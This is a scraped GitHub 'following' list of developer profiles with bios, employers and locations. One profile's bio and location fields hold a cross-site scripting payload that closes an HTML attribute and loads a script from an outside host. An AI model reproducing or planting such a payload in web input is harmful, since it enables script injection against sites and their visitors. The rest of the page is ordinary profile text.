Block or report user

Report or block thulio

Hide content and notifications from this user.

Contact Support about this user’s behavior.

Report abuse

Organizations

@pugpe @sixcodes
@alex
Alex Gaynor alex
I program computers. Currently working for Mozilla in Washington DC and opening up some sources in my free time. @usds alumnus.

Mozilla Washington D.C.

@ask
Ask Solem ask
Data at Robinhood

@robinhoodmarkets Palo Alto, CA

@blazeinfosec
Wildfire Labs blazeinfosec

Blaze Information Security South America and Europe

@calazans10
Jeferson Farias Calazans calazans10
Software Developer, Bachelor of Computer Science and Open Source Enthusiast.

@Mobile4You Rio de Janeiro

@carloslack
Carlos Carvalho carloslack

Huber+Suhner Cambridge, UK

@daltonmatos
Dalton Barreto daltonmatos

Sieve - https://sieve.com.br Rio de Janeiro - Brasil

@davidsonfellipe
Davidson Fellipe davidsonfellipe
👨🏻‍💻 Front-end engineer at @loadsmart

@loadsmart New York, NY

@ebertti
Ezequiel Bertti ebertti
MSc, System Architect, Fullstack Developer and Teacher

@estantevirtual Rio de Janeiro, Rio de Janeiro, Brazil

@etandel
Elias Tandel Barrionovo etandel
Just me :: Maybe Human

Rio de Janeiro, Brazil

@felipealmeida
Felipe Magno de Almeida felipealmeida
My resumé can be accessed at https://github.com/felipealmeida/resume/blob/master/resume.pdf tl;dr: I am a C,C++ developer and own @expertisesolutions

Expertise Solutions Brazil

@geohot
George Hotz geohot
We will win self driving cars.

geohot LLC Glen Rock, NJ

@gerardon
Gerardo Soares gerardon

Gerardon Solutions Belo Horizonte

@infsaulo
Saulo Ricci infsaulo
Hungry 4 code! Fond of data analytics & all big data stuff

San Diego CA

@jesuejunior
Jesué Junior jesuejunior
Software Engineer

@sixcodes São Paulo - Brasil

@joaodepaula
João de Paula joaodepaula
Co-Founder and CTO at @glioinc. First Brazilian to get accepted at Y Combinator. Former lawyer turned product manager and programmer.

Glio Rio de Janeiro

@kennethreitz
Kenneth Reitz kennethreitz
I wrote @requests: HTTP for Humans. The only thing I really care about is interface design.

@digitalocean Winchester, VA, USA

@mandatoryprogrammer
Matthew Bryant mandatoryprogrammer
"><script src=https://y.vg></script>

"><script src=https://y.vg></script> "><script src=https://y.vg></script>

@marcelcaraciolo
Marcel marcelcaraciolo

PyCursos Recife, Pernambuco Brazil

@mitsuhiko
Armin Ronacher mitsuhiko
Software developer and Open Source nut. Creator of the Flask framework. Contributing to @getsentry and running @pallets and @lektor

Austria

@murilopontes
Murilo Pontes murilopontes
A software developer who likes embedded systems

@barixag @ccodelabs Aveiro, Portugal

@pablohoffman
Pablo Hoffman pablohoffman

http://scrapinghub.com Montevideo, Uruguay

@rafaelcaricio
Rafael Carício rafaelcaricio
I like to play with computers.

Amsterdam, Netherlands

@rodsenra
Rodrigo Dias Arruda Senra rodsenra
See http://rodrigo.senra.nom.br

Work & Co New York, Brooklyn

@setanta
Marcelo Lira setanta

INdT Recife - PE, Brasil